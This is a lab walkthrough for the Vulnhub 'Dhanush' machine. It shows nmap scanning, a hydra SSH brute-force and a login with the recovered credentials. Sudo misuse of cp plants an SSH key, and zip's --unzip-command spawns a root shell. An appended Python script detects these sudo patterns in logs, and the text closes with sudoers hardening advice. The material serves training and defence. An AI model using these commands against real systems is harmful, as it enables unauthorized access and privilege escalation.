Vulnhub Dhanush Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.10 -vv

The host page is full of text in English and some other writing, so let's use cewl to grab the words.

Copy the text to a file and remove the entries you don't want. There are a lot of names, and we only need them as a username file to brute-force the SSH service on port 65345.

hydra -L users.txt -P users.txt ssh://192.168.1.10:65345

Now let's log in using the username pinak and the password Gandiv

When running sudo -l it gave us a message

In the home directory of the user sarang there is an .ssh folder, but trying to copy it gave us a permission denied error. So we are going to generate our own SSH keys, copy the public key into place as the user sarang, and then use ssh with the sarang username to get access to their folder.

ssh-keygen

cat /home/pinak/.ssh/id_rsa.pub > /home/pinak/authorized_keys

sudo -u sarang /bin/cp /home/pinak/authorized_keys /home/sarang/.ssh/authorized_keys

ssh sarang@127.0.0.1 -p 65345

cd /tmp

touch test

sudo /usr/bin/zip test.zip test -T --unzip-command="sh -c /bin/bash"
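From the defender's side, both sudo steps above leave entries in the sudo log. The following is an added example, not part of the original walkthrough, that flags them in syslog-style sudo lines; the hostname, timestamps, the backup and admin lines, and the rule names are constructed for illustration.

```python
import re

# Constructed sample lines in sudo's syslog format (not taken from the original post).
# sudo logs the argument list joined by spaces, so shell quoting is already gone.
SAMPLE_LOG = """\
Mar  3 10:01:11 dhanush sudo:    pinak : TTY=pts/0 ; PWD=/home/pinak ; USER=sarang ; COMMAND=/bin/cp /home/pinak/authorized_keys /home/sarang/.ssh/authorized_keys
Mar  3 10:02:40 dhanush sudo:   sarang : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/zip test.zip test -T --unzip-command=sh -c /bin/bash
Mar  3 10:05:02 dhanush sudo:   backup : TTY=pts/2 ; PWD=/srv ; USER=root ; COMMAND=/usr/bin/zip -r site.zip www
Mar  3 10:06:30 dhanush sudo:    admin : TTY=pts/3 ; PWD=/root ; USER=root ; COMMAND=/bin/cp /etc/hosts /etc/hosts.bak
"""

LINE_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.+)$"
)
SSH_DEST = re.compile(r"/\.ssh(/|$)")  # destination inside someone's .ssh directory


def parse(line):
    """Return invoking user, target user and command from one sudo log line."""
    m = LINE_RE.search(line)
    return m.groupdict() if m else None


def findings(log_text):
    """Return (user, target, rule) tuples for the two patterns in the walkthrough."""
    out = []
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None:
            continue
        argv = ev["cmd"].split()
        prog, args = argv[0].rsplit("/", 1)[-1], argv[1:]
        # zip runs an arbitrary test command when -TT / --unzip-command is given.
        if prog == "zip" and any(a.startswith(("-TT", "--unzip-command")) for a in args):
            out.append((ev["user"], ev["target"], "zip-unzip-command"))
        # cp run as another account with a destination under .ssh plants a login key.
        # Only the last argument is treated as the destination (cp -t is not handled).
        elif prog == "cp" and args and SSH_DEST.search(args[-1]):
            out.append((ev["user"], ev["target"], "cp-into-ssh-dir"))
    return out


if __name__ == "__main__":
    for user, target, rule in findings(SAMPLE_LOG):
        print(f"{rule}: {user} ran sudo as {target}")
```

The durable fix is in sudoers itself: neither cp run as another user nor zip run as root should be granted without restricting the arguments.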
